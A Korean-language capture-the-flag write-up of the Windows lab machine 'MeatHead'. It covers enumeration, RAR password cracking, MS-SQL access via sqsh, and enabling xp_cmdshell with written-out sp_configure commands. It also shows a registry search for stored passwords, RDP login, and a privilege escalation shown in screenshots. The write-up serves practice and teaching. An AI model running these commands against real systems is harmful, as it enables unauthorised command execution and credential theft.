40. MeatHead (HARD) - Windows (rar, rar2john, sqsh, xp_cmdshell, 레지스트리 검색)*
1. Enumeration
: Nmap
![](https://blog.kakaocdn.net/dn/eb4ORN/btrLKgX1cSp/a73TgmXYeK7omFvwqR7i40/img.png)
> 80 : plantronics
> hostname : meathead
: smb enum
![](https://blog.kakaocdn.net/dn/bpvTfY/btrLJZoF3yd/xoa7VkEKEbJxNxGnKoqZmk/img.png)
: web enum
![](https://blog.kakaocdn.net/dn/cYNNge/btrLLZtGqNg/HHFnqKTVKAl8Bjc1B1o8k1/img.png)
![](https://blog.kakaocdn.net/dn/wfLUV/btrLK4WPbIp/PfznsMGc6wcejcuiuqIRWk/img.png)
> 로그인을 시도해 보면
![](https://blog.kakaocdn.net/dn/sxC4j/btrLLYO41SF/dkjaqGKMxmABjfVfOvXdHK/img.png)
: ftp enum
![](https://blog.kakaocdn.net/dn/Rk9Qf/btrLKxZrR3V/rdXKWIEPZfemFkyRFTiAL0/img.png)
> 내려받은 후 살펴보면
![](https://blog.kakaocdn.net/dn/dA7Run/btrLJZPJHoF/swkwIfAh6kIPXlQikQVSMK/img.png)
![](https://blog.kakaocdn.net/dn/79Z5x/btrLKhbwiVF/AmrJQ7qTbbirJgVCdsEksK/img.png)
> 비번 걸려있음
2. Exploitation
: 크랙 작업
![](https://blog.kakaocdn.net/dn/D7ldV/btrLJLKXGCg/PsgTyR2lbjNIVM7QCdQrjk/img.png)
> 크랙 가능한 형태로 만들어주고 돌려주면
![](https://blog.kakaocdn.net/dn/wXIy0/btrLKxytLCO/6I1Dp96C5ipFvBmTb7M9S0/img.png)
> 성공!
비번을 사용해 unrar을 시도하면
![](https://blog.kakaocdn.net/dn/N2KUO/btrLLhImQ39/9KK81w6E3m0PWZlm6BJNfK/img.png)
> 백업 파일이 있고, 열어보면
![](https://blog.kakaocdn.net/dn/TPztu/btrLJK6ouqY/0jHii53mVtEBpLlTHCkfRk/img.png)
> ms-sql creds 확인!
: SQShell(SQSH)을 활용한 시스템 커맨드 실행
방법 1) 바로 접속
![](https://blog.kakaocdn.net/dn/FrNbN/btrLKxkTJfj/PoQFfSnM1eULHBHIKVyf70/img.png)
방법 2) Config 설정 후 sqshrc 생성해 접속
: config 설정
![](https://blog.kakaocdn.net/dn/dz9lOJ/btrLKFCYFFm/mHECP1gN1AJKGdVkPxMuN1/img.png)
![](https://blog.kakaocdn.net/dn/cnzNOV/btrLKE48O7r/or9L6WkZJ61xPBiqvnjZR0/img.png)
: .sqshrc 생성
![](https://blog.kakaocdn.net/dn/wz46p/btrLK43yp2p/2ySZ9cgWZ6YNfSE52VLkXk/img.png)
: 접속 시도해 보면
![](https://blog.kakaocdn.net/dn/cv0GKJ/btrLKxFbWap/vbHmgW52tDY1phZDrwcoC1/img.png)
성공!
어떤 방법이든 상관없음!
#sqsh OS 커맨드 실행
(sa 유저이기 때문에 xp_cmdshell을 통한
OS 커맨드 실행이 가능한 상황!)
1) 버전 확인
root@takudaddy:~# sqsh -S Meathead
sqsh-2.5.16.1 Copyright (C) 1995-2001 Scott C. Gray
Portions Copyright (C) 2004-2014 Michael Peppler and Martin Wesdorp
This is free software with ABSOLUTELY NO WARRANTY
For more information type '\warranty'
1> SELECT @@VERSION;
2> go
: Microsoft SQL Server 2017 (RTM) - 14.0.1000.169 (X64)
Aug 22 2017 17:04:49
Copyright (C) 2017 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
(1 row affected)
1>
2) xp_cmdshell 활성화
1> EXEC sp_configure 'show advanced option', '1';
2> go
Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE WITH OVERRIDE;
2> go
1> EXEC sp_configure 'xp_cmdshell', 1;
2> go
Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
(return status = 0)
1> RECONFIGURE;
2> go
1> EXEC sp_configure 'show advanced option';
2> go
name: show advanced options
minimum: 0
maximum: 1
config_value: 1
run_value: 1
(return status = 0)
1>
: 활성화 후 커맨드 실행 테스트
![](https://blog.kakaocdn.net/dn/bHKbEv/btrLJLdaaLt/jj5PMR2PqZ27kczqOnGVP1/img.png)
> 정상 작동!
3) Local Enum
: systeminfo
![](https://blog.kakaocdn.net/dn/cUzQkh/btrLKI0Kffz/Hr8y3F5ZNDVMpv8bWqLFUk/img.png)
: 사용자 검색 - net user
![](https://blog.kakaocdn.net/dn/bXF97s/btrLK4P1OJA/XkCIfqYyMRrOEtq7H7CQ7k/img.png)
> jane
: 암호 검색 - reg query
레지스트리에서 특정 검색어 (pass) 검색
reg query HKLM /f pass /t REG_SZ /s
> 내용이 너무 많아 검색어 변경 후 재요청
![](https://blog.kakaocdn.net/dn/bnW5Iy/btrLLXWWgXq/kkdnKGIAEHeSjykAkWkNHK/img.png)
> Twil*************234
: RDP 접속
![](https://blog.kakaocdn.net/dn/b96bzL/btrLK0UpGlL/R11KEWkSXXfE9kXVsxOOCK/img.png)
> 침투 완료!
3. Privilege Escalation
Nmap 결과에서
80이 plantronics 임을 확인했고
관련 exploit을 찾으면 PoC 확인이
가능하고
![](https://blog.kakaocdn.net/dn/brHbEz/btrLLyb1bRR/JKJjQRreekwbzmoqLZHaw0/img.png)
내용대로 진행하면
![](https://blog.kakaocdn.net/dn/8u56X/btrLKFJMn9Z/MPqDvn4OepPx1S52KaPdKK/img.png)
![](https://blog.kakaocdn.net/dn/TxCpj/btrLK0NCka9/bS9h7EpFG8EFKqIY1IZ58k/img.png)
끝